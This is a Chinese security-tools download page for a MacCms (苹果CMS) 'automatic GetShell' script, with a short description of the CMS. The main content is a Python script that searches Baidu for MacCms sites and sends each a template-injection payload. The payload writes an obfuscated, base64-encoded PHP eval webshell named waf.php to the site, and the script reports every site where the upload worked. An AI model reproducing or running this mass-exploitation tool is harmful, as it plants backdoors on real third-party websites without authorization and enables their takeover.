当前位置：首页 → 网络安全 → 安全工具 → MacCms(苹果CMS)全自动GetShell脚本（暂无资源）

MacCms(苹果CMS)全自动GetShell脚本（暂无资源）

评分：0.0分

下载地址

本地下载

软件Tags： [db:tag]

CMS简介

苹果CMS是国内优秀的开源PHP建站系统,擅长电影程序、视频程序这一块,在主流建站系统中特色鲜明,以灵活、小巧、兼容性好、负载强等优点而深受许多站长的喜爱。

大多数的影视站点都用的这款CMS。

# coding=utf-8
import requests
import urllib
from bs4 import BeautifulSoup
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0"
}
def xxe():
exp = '&wd={{page:lang}if-:fputs(fopen(base64_decode(d2FmLnBocA),w),base64_decode(PD9waHAgJGFycj0iantmcS0pZFVUWFlgfWIuQCI7IGZvcigkaT0wOyRpPCBzdHJsZW4oJGFycik7JGkrKyl7JGFyclskaV09Y2hyKG9yZCgkYXJyWyRpXSktNSk7fWV2YWwoJGFycik7Pz4))}22{endif-}&submit='
keyurl = 'http://www.baidu.com/s?wd=inurl:index.php?m=vod-search' + '&pn='
x = 0
while True:
url = keyurl + str(x * 10)
x+=1
xxx = requests.get(url=url,headers=headers).text
req = BeautifulSoup(xxx,'html.parser')
html = req.select('div.c-container > h3 > a')
#sqls = requests.get(a['href']).status_code
#sql = requests.get(a['href']).url
# xxe()
sql = html[0].attrs['href']
sqlss = requests.get(sql).url
shell = urllib.urlopen(url=sqlss,data=exp).read()
if '您的提交带有不合法参数' in shell:
print '没有漏洞'
else:
print shell + '\n\t此网站存在漏洞,一句话地址waf.php'
xxe()